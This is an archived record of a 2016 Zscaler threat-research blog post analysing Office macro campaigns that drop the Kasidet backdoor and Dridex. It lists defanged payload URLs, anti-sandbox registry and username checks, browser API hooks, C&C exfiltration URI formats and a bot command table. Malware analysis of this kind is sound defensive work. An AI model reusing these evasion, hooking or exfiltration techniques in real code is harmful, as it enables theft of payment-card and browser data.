{
	"id": "1d06713b-c0ec-4fa0-a752-cb96bf06cc67",
	"created_at": "2026-04-06T00:20:15.068113Z",
	"updated_at": "2026-04-10T03:21:50.149574Z",
	"deleted_at": null,
	"sha1_hash": "f85f5d1061097b335243f1691a8128123c9a12a7",
	"title": "Malicious Office Files Dropping Kasidet And Dridex | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 317825,
	"plain_text": "Malicious Office Files Dropping Kasidet And Dridex | Zscaler\r\nBy Nirmal Singh\r\nPublished: 2016-01-29 · Archived: 2026-04-05 12:39:27 UTC\r\nZscaler Blog\r\nGet the latest Zscaler blog updates in your inbox\r\nIntroduction \r\nWe have covered Dridex Banking Trojan being delivered via various campaigns involving Office documents with\r\nmalicious VBA macros in the past. However, over the past two weeks we are seeing these malicious VBA macros\r\nleveraged to drop Kasidet backdoor in addition to Dridex on the infected systems. These malicious Office\r\ndocuments are being spread as an attachment using spear phishing emails as described here. The malicious macro\r\ninside the Office document is obfuscated as shown in the code snapshot below -\r\nMacro code\r\nThe macro downloads malware payload from the hardcoded URL. We have seen following URLs used in different\r\ndocument payloads that we captured for this campaign:\r\n      armandosofsalem[.]com/l9k7hg4/b4387kfd[.]exe\r\n      trinity.ad-ventures[.]es/l9k7hg4/b4387kfd[.]exe\r\n      188.226.152[.]172/l9k7hg4/b4387kfd[.]exe\r\nIn this blog, we will provide a detailed analysis for the Kasidet variant that we spotted in this campaign.\r\nKasidet Analysis\r\nInstallation: \r\nKasidet installs itself into %APPDATA% folder. It creates a new folder there with the name \"Y1FeZFVYXllb\",\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 1 of 7\n\nthis string is hardcoded in the malware. The same string is used as mutex name and in creating a Registry key for\r\nensuring persistence upon system reboot.\r\nAntiVM Check:\r\nKasidet tries to detect analysis systems during execution through following checks.\r\nChecking Dubugger through \"IsDebuggerPresent\" and \"CheckRemoteDebuggerPresent\" Windows APIs. It also\r\nchecks for the following popular sandbox related strings:\r\nUser Name: \"MALTEST\",  \"TEQUILABOOMBOOM\", \"SANDBOX\", \"VIRUS\", \"MALWARE\"\r\nFile Name: \"SAMPLE\", \"VIRUS\", \"SANDBOX\"\r\nIt tries to detect wine software by checking if kernel32.dll is exporting \"wine_get_unix_file_name\" function or\r\nnot. It detects Vmware, VirtualBox, QEMU and Bochs by checking for following registry entries:\r\n \r\nVmware\r\n\"SOFTWARE\\\\VMware, Inc.\\\\VMware Tools\"\r\n\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port\\Scsi Bus\\Target Id\\Logical Unit Id\", \"Identifier\" ,\r\nVmware\"\r\n\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port\\Scsi Bus\\Target Id\\Logical Unit Id\", \"Identifier\" ,\r\n\"VBOX\"\r\n \r\nVirtualBox\r\n\"HARDWARE\\\\Description\\\\System\", \"SystemBiosVersion\" , \"VBOX\"\r\nSOFTWARE\\\\Oracle\\\\VirtualBox Guest Additions\"\r\n\"HARDWARE\\\\Description\\\\System\", \"VideoBiosVersion\" , \"VIRTUALBOX\"\r\nQEMU\r\n\"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port \\Scsi Bus \\Target Id \\Logical Unit Id \",\r\n\"Identifier\" , \"QEMU\"\r\n\"HARDWARE\\\\Description\\\\System\" , \"SystemBiosVersion\" , \"QEMU\"\r\nBochs \"HARDWARE\\\\Description\\\\System\" , \"SystemBiosVersion\" , \"BOCHS”\r\nInformation Stealing capabilities:\r\nKasidet uses following two methods for stealing information from the victim's machine:\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 2 of 7\n\n1. Memory Scraping – This allows Kasidet to steal credit card data from the memory of Point-Of-Sale (POS)\r\nsystems. It scans the memory of all the running processes except the operating system processes listed below:\r\nSystem\r\nsmss.exe\r\ncsrss.exe\r\nwinlogon.exe\r\nlsass.exe\r\nspoolsv.exe\r\ndevenv.exe\r\nThe stolen information is relayed back to the attacker using following URI format – \r\nd=1\u0026id=\u0026name=\u0026type=\u0026data=\u0026p=\r\n2. Browser Hooking –  This allows Kasidet to steal data from Web browsers. It can inject code into FireFox,\r\nChrome, and Internet Explorer (IE). Browser names are not saved in plain text and instead this variant uses the\r\nsame hash function as used by Carberp malware to encrypt the browser names. The following APIs are hooked in\r\nthe web browser for stealing sensitive data: \r\nBrowser API\r\nFireFox PR_Write\r\nChrome WSASend\r\nIE HttpSendRequestW , InternetWriteFile\r\nThe stolen information is relayed back to the attacker using following URI format – \r\nff=1\u0026id=\u0026name=\u0026host=\u0026form=\u0026browser=\r\nThe information stealing feature of this Kasidet variant were deactivated if the system locale or GeoUserID\r\ncorresponds to Russia.\r\nNetwork communication:\r\nKasidet contains a hardcoded list of Command \u0026 Control (C\u0026C) server locations. It uses CryptStringToBinary\r\nAPI call to decrypt the embedded C\u0026C URLs as seen below:\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 3 of 7\n\nKasidet C\u0026C list\r\nUpon successful infection, Kasidet sends a HTTP POST request with data “enter=1” (without quotes). All HTTP\r\nheader fields (User-Agent, Content-type and Cookie) are hard coded in the payload itself.\r\nKasidet Hardcoded HTTP fields\r\nC\u0026C Server will not return required data if HTTP header fields are different.  The server sends a fake 404\r\nresponse code and html data stating that page is not found but the C\u0026C commands will be hidden in the response\r\nHTML comment tag as seen below:\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 4 of 7\n\nKasidet - First communication with C\u0026C\r\nKasidet will request for additional commands from the C\u0026C server with the following POST request:\r\nKasidet request for additional commands\r\nVariable Descriptions\r\ncmd Command. It is hardcoded in the malware payload as '1'.\r\nid MachineGuid value fetched  from Software\\Microsoft\\Cryptography registry key\r\nname System Name\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 5 of 7\n\nos Operating system version\r\np Process elevation status\r\nav Antivirus installed on the infected system\r\nv Version of the bot. It is hardcoded in the malware. Current version that we analysed is 4.4\r\nw Flag that indicates whether the system locale and UserGeoID is Russia\r\nLike browser names, all the command strings are also encrypted using a hash function. Below are some of the\r\nimportant commands:\r\nCommand Hash Description\r\n0x0E587A65\r\n(rate\r\n)\r\nIt is used in sleep function\r\n0x89127D3 DDOS using HTTP protocol\r\n0x0B37A84B6 Start keylogging and screen capture threads\r\n0x89068E8h Download and execute additional component. This file can be DLL, EXE or VBS.\r\n0x4A9981B7 Search for given process name in current running processes in the system\r\n0x8D26744 Find given file in system and upload to the server\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 6 of 7\n\n0CAB1E64A\r\nDrop setting.bin file,  change firewall settings to download and execute plugin\r\ncomponent\r\n0x10E6C4 Execute given command using windows cmd.exe\r\nConclusion \r\nMalicious Office document file is a popular vector for malware authors to deliver their payloads. Dridex authors\r\nhave leveraged this technique for over a year and it was interesting to see the same campaign and URLs being\r\nleveraged to deliver Kasidet payloads. While this does not establish any links between the two malware family\r\nauthors, it reaffirms the fact that a lot of the underlying infrastructure and delivery mechanisms are often shared\r\nby these cyber criminals.\r\nThreatLabZ is actively monitoring this threat and ensuring signature coverage for Zscaler customers.\r\nAnalysis by - Abhay Yadav, Avinash Kumar and Nirmal Singh\r\nThank you for reading\r\nWas this post useful?\r\nDisclaimer: This blog post has been created by Zscaler for informational purposes only and is provided \"as is\"\r\nwithout any guarantees of accuracy, completeness or reliability. Zscaler assumes no responsibility for any errors or\r\nomissions or for any actions taken based on the information provided. Any third-party websites or resources\r\nlinked in this blog post are provided for convenience only, and Zscaler is not responsible for their content or\r\npractices. All content is subject to change without notice. By accessing this blog, you agree to these terms and\r\nacknowledge your sole responsibility to verify and use the information as appropriate for your needs.\r\nExplore more Zscaler blogs\r\nGet the latest Zscaler blog updates in your inbox\r\nBy submitting the form, you are agreeing to our privacy policy.\r\nSource: https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nhttps://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex"
	],
	"report_names": [
		"malicious-office-files-dropping-kasidet-and-dridex"
	],
	"threat_actors": [],
	"ts_created_at": 1775434815,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f85f5d1061097b335243f1691a8128123c9a12a7.pdf",
		"text": "https://archive.orkl.eu/f85f5d1061097b335243f1691a8128123c9a12a7.txt",
		"img": "https://archive.orkl.eu/f85f5d1061097b335243f1691a8128123c9a12a7.jpg"
	}
}